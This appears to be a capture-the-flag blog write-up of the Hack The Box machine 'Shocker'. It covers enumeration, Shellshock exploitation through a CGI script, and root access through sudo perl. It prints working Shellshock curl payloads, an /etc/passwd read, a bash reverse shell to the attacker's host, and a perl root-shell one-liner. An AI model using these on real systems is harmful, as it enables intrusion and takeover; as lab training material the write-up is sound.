Post

Write-up Shocker on HTB

It’s still early in the evening and I still have some time left to hack a machine. From TJnull’s OSCP list I saw the machine Shocker from Hack The Box. Based on the name, I do have a suspicion which vulnerability can be exploited. I decide to hack the machine.

HTB - Shocker writeup

After starting the machine on HTB, an IP address was assigned. I copied the IP address and made a variable in the CLI.

1
2
┌──(emvee㉿kali)-[~]
└─$ ip=10.129.49.36

Time to see if the machine was up and running and would respond to a ping request.

1
2
3
4
5
6
7
8
9
10
11
┌──(emvee㉿kali)-[~]
└─$ ping -c3 $ip
PING 10.129.49.36 (10.129.49.36) 56(84) bytes of data.
64 bytes from 10.129.49.36: icmp_seq=1 ttl=63 time=17.7 ms
64 bytes from 10.129.49.36: icmp_seq=2 ttl=63 time=17.7 ms
64 bytes from 10.129.49.36: icmp_seq=3 ttl=63 time=17.1 ms

--- 10.129.49.36 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2015ms
rtt min/avg/max/mdev = 17.058/17.515/17.745/0.323 ms

The target responded to my ping request and I noticed a value of 63 in the ttl field. An indicator that this machine is running on a Linux distro. Let’s see what ports are open and what services are running on this machine. To do this I use my favorite nmap command sudo nmap -sC -sV -T4 -A -O -p- $ip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(emvee㉿kali)-[~]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for emvee: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-22 18:53 CEST
Nmap scan report for 10.129.49.36
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/22%OT=80%CT=1%CU=32505%PV=Y%DS=2%DC=T%G=Y%TM=635420
OS:34%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M539ST11NW6%O2=M539ST11NW6%O3=M539NNT11NW6%O4=M539ST11NW6%O5=M539ST
OS:11NW6%O6=M539ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M539NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G
OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   17.36 ms 10.10.14.1
2   17.41 ms 10.129.49.36

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.37 seconds

Withing 30 seconds nmap showed me some results of the port scan. I notice that the SSH service is running on port 2222 and not on port 22. On port 80 I see Apache running 2.4.18. I then make the following notes in my notes.

  • Linux, probably an Ubuntu distro
  • Port 80
    • HTTP
    • Apache/2.4.18
  • Port 2222
    • OpenSSH 7.2p2

Based on this infomation I decided to run whatweb to identify some technologies and frameworks are used on this website.

1
2
3
┌──(emvee㉿kali)-[~]
└─$ whatweb http://$ip
http://10.129.49.36 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.49.36]

For now, there was no new information discovered with whatweb. Time to use Nikto, because I know that it is good in finding vulnerabilities in webservers. Perhaps it would discover the vulnerability for shocker were I am looking for.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(emvee㉿kali)-[~]
└─$ nikto -h http://$ip           
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.49.36
+ Target Hostname:    10.129.49.36
+ Target Port:        80
+ Start Time:         2022-10-22 18:55:22 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-10-22 18:58:20 (GMT2) (178 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Time to see what is running on the website via the web browser.

Image

Unfortunately, it didn’t show the vulnerability I was looking for. Will my suspicion be wrong and will there be no shellshock present? I decided to search for directories on the web server with dirsearch.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(emvee㉿kali)-[~]
└─$ dirsearch -u http://$ip -e php,txt,bak

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, txt, bak | HTTP method: GET | Threads: 30 | Wordlist size: 9947

Output File: /home/emvee/.dirsearch/reports/10.129.49.36/_22-10-22_19-00-05.txt

Error Log: /home/emvee/.dirsearch/logs/errors-22-10-22_19-00-05.log

Target: http://10.129.49.36/

[19:00:05] Starting: 
[19:00:06] 403 -  298B  - /.ht_wsr.txt                                     
[19:00:06] 403 -  301B  - /.htaccess.bak1                                  
[19:00:06] 403 -  301B  - /.htaccess.save                                  
[19:00:06] 403 -  303B  - /.htaccess.sample
[19:00:06] 403 -  301B  - /.htaccess_orig
[19:00:06] 403 -  299B  - /.htaccess_sc
[19:00:06] 403 -  301B  - /.htaccess.orig
[19:00:06] 403 -  300B  - /.htaccessOLD2                                   
[19:00:06] 403 -  299B  - /.htaccessBAK
[19:00:06] 403 -  299B  - /.htaccessOLD
[19:00:06] 403 -  292B  - /.html
[19:00:06] 403 -  291B  - /.htm
[19:00:06] 403 -  302B  - /.htaccess_extra
[19:00:06] 403 -  298B  - /.httr-oauth
[19:00:06] 403 -  297B  - /.htpasswds                                      
[19:00:06] 403 -  301B  - /.htpasswd_test                                  
[19:00:18] 403 -  295B  - /cgi-bin/                                         
[19:00:25] 200 -  137B  - /index.html                                       
[19:00:37] 403 -  300B  - /server-status                                    
[19:00:37] 403 -  301B  - /server-status/                                   
                                                                             
Task Completed  

I noticed the /cgi-bin/ directory is present, but forbidden. Might it be still vulnerable for shellshock? Time to enumerate some scripts within this directory with dirsearch.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(emvee㉿kali)-[~]
└─$ dirsearch -u http://$ip/cgi-bin -e sh,pl,cgi            

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: sh, pl, cgi | HTTP method: GET | Threads: 30 | Wordlist size: 10021

Output File: /home/emvee/.dirsearch/reports/10.129.49.36/-cgi-bin_22-10-22_19-06-34.txt

Error Log: /home/emvee/.dirsearch/logs/errors-22-10-22_19-06-34.log

Target: http://10.129.49.36/cgi-bin/

[19:06:34] Starting: 
[19:06:36] 403 -  309B  - /cgi-bin/.htaccess.orig                          
[19:06:36] 403 -  309B  - /cgi-bin/.htaccess_orig                          
[19:06:36] 403 -  307B  - /cgi-bin/.htaccessBAK
[19:06:36] 403 -  308B  - /cgi-bin/.htaccessOLD2
[19:06:36] 403 -  300B  - /cgi-bin/.html
[19:06:36] 403 -  299B  - /cgi-bin/.htm                                    
[19:06:36] 403 -  306B  - /cgi-bin/.httr-oauth
[19:06:36] 403 -  305B  - /cgi-bin/.htpasswds
[19:06:36] 403 -  307B  - /cgi-bin/.htaccessOLD
[19:06:36] 403 -  306B  - /cgi-bin/.ht_wsr.txt
[19:06:36] 403 -  309B  - /cgi-bin/.htaccess.bak1
[19:06:36] 403 -  310B  - /cgi-bin/.htaccess_extra                         
[19:06:36] 403 -  309B  - /cgi-bin/.htaccess.save
[19:06:36] 403 -  309B  - /cgi-bin/.htpasswd_test
[19:06:36] 403 -  311B  - /cgi-bin/.htaccess.sample                        
[19:06:36] 403 -  307B  - /cgi-bin/.htaccess_sc                            
[19:07:12] 200 -  119B  - /cgi-bin/user.sh                                  
                                                                             
Task Completed   

Dirsearch has found a script called: user.sh. I’ve no idea what it could be. So I have to look closer with curl to see what I can identify.

1
2
3
4
5
6
7
┌──(emvee㉿kali)-[~]
└─$ curl http://$ip/cgi-bin/user.sh                              
Content-Type: text/plain

Just an uptime test script

 13:08:06 up 15 min,  0 users,  load average: 0.00, 0.02, 0.00

It looks like a Bash script is availble in the cgi-bin. I’ve no ideau how I can use this for the moment. I have to a bit of research on the internet and I’ve found a website with some details about pentesting cgi on hacktricks. While reading the article on hacktricks I noticed that nmap could detect a shellshock vulnerability as well…. So let’s try it on my target on HTB. The command what I have to use is: nmap $ip -p 80 –script=http-shellshock –script-args uri=/cgi-bin/user.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(emvee㉿kali)-[~]
└─$ nmap $ip -p 80 --script=http-shellshock --script-args uri=/cgi-bin/user.sh  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-22 19:55 CEST
Nmap scan report for 10.129.49.36
Host is up (0.028s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169

Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Another method according hacktricks is to run the command against the user-agent with curl and adept the command with a sleep command. If the response has a delay, it is vulnerable to a shellshock exploit. The command what I use to try manually looks like this: curl -H ‘User-Agent: () { :; }; /bin/bash -c “sleep 5”’ http://$ip/cgi-bin/user.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(emvee㉿kali)-[~]
└─$ curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://$ip/cgi-bin/user.sh
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator at 
 webmaster@localhost to inform them of the time this error occurred,
 and the actions you performed just before this error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.129.49.36 Port 80</address>
</body></html>

It took a while before the response was shown, but I did not like the error displayed to me as an Internal Server Error. I decided to look further on the internet and I found a article on seven layers about exploiting a shellshock manually. After reading the article I thought to give it a try against shocker. To see if the exploit would work with this command a request is made to the id binary on the target. The exploit command what I will use looks like this: curl -A “() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id” http://$ip/cgi-bin/user.sh

1
2
3
4
┌──(emvee㉿kali)-[~]
└─$ curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://$ip/cgi-bin/user.sh

uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

The id of the user is shown to me, now let’s try to cat the /etc/passwd file on the target before creating a reverse shell on the target.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(emvee㉿kali)-[~]
└─$ curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://$ip/cgi-bin/user.sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash

The command shows the /etc/passwd content after running the command to exploit the shellshock vulnerability. To gain a shell on the system I start a netcat listener on the machine.

1
2
3
4
5
┌──(emvee㉿kali)-[~]
└─$ nc -lvp 9999
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

As soon as the netcat listener is active and listening on port 9999, it is time to create a reverse shell back to my listener. I use a simple Bash reverse shell which is most of the time very stable.

1
2
┌──(emvee㉿kali)-[~]
└─$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.66/9999 0>&1' http://$ip/cgi-bin/user.sh

After running the command to exploit the shellshock vulnerability I have to check my netcat listener on Kali.

1
2
3
4
5
6
7
8
9
┌──(emvee㉿kali)-[~]
└─$ nc -lvp 9999
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.129.49.36.
Ncat: Connection from 10.129.49.36:41226.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ 

It looks like a connection has been established to my netcat listener. Now it’s time to see who I am on the machine.

1
2
3
4
5
6
shelly@Shocker:/usr/lib/cgi-bin$ whoami;id;hostname;pwd
whoami;id;hostname;pwd
shelly
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Shocker
/usr/lib/cgi-bin

It looks like I am shelly on the machine shocker and I am a member of a few groups as well. Before escalting the privileges I want to capture the user flag. The user flag is stored in the user directory.

1
2
3
4
5
6
7
8
9
shelly@Shocker:/usr/lib/cgi-bin$ cd ~
cd ~
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
< ---- USER FLAG ---- >
shelly@Shocker:/home/shelly$ 

After capturing the user flag it’s time to gain more privilges on the system. Let’s check what privileges I have with sudo -l. Sometimes it requires a password to run, but if it is not needed, it is an awesome privilege to use.

1
2
3
4
5
6
7
8
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

While using my Google Fu to look for GTFOBINS perl sudo I opened the website. GTFOBINS is a great resource for privilege escalation, that’s why I used it in my search query. To spawn a shell as root with sudo I have to enter the following command according GTFObins: sudo /usr/bin/perl -e ‘exec “/bin/sh”;’

1
2
3
4
5
6
7
8
9
10
11
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
Shocker
cd /root
ls
root.txt
cat root.txt
< ---- ROOT FLAG ---- >

The root flag have been captured! This was a pretty easy machine.

This post is licensed under CC BY 4.0 by the author.